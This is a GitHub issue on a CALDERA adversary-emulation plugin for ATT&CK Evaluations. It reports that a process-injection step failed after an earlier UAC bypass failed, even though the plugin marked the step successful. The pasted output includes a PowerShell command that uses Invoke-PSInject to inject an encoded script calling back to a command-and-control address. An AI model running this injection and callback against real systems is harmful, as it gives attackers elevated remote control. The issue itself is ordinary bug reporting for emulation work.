mitre-attack / evals_caldera

A CALDERA plugin for ATT&CK Evaluations Round 1


[Plugin - Phase 10 - 3.B.1] Process Discovery (T1057), 3.C.1 - Process Injection (T1055)

Cyb3rWard0g opened this issue · comments

Good evening,

This issue goes along with the one here: #1, since it has the same setup and operation execution.

As described in the previous issue, I also had two processes running as administrator (right-clicked on cmd and powershell and ran them as Administrator). I believe that since the previous step, Phase 9 - 3.A.1 (bypassUAC), failed as shown in #1, this step could not run properly.

Script: https://github.com/mitre-attack/evals_caldera/blob/08315bfa28df7f6a10db3a9abadba1fdba9b2d96/data/abilities/privilege-escalation/088b8639-3f37-42cc-9dc8-01aabb645461.yml

Output:

```
Import-Module .\Invoke-PSInject.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Inject -PoshCode $pcode;
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
Get-Process : The 'IncludeUserName' parameter requires elevated user rights. Try running the command again
in a session that has been opened with elevated user rights (that is, Run as Administrator).
At C:\Users\pgustavo\Invoke-PSInject.ps1:3583 char:5
+     Get-Process -IncludeUserName | Where-Object { $_.UserName -like " ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-Process], InvalidOperationException
    + FullyQualifiedErrorId : IncludeUserNameRequiresElevation,Microsoft.PowerShell.Commands.GetProcessCommand
```

According to the description of this step:

description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT.

BypassUAC failed first, so it makes sense I guess that this step did not work.

(screenshot attached to the original issue)

One thing to mention too is that the plugin says that the Phase 10 - 3.B.1 step ran successfully. However, as shown above, it did not. A screenshot:

(screenshot attached to the original issue)

Thank you in advance!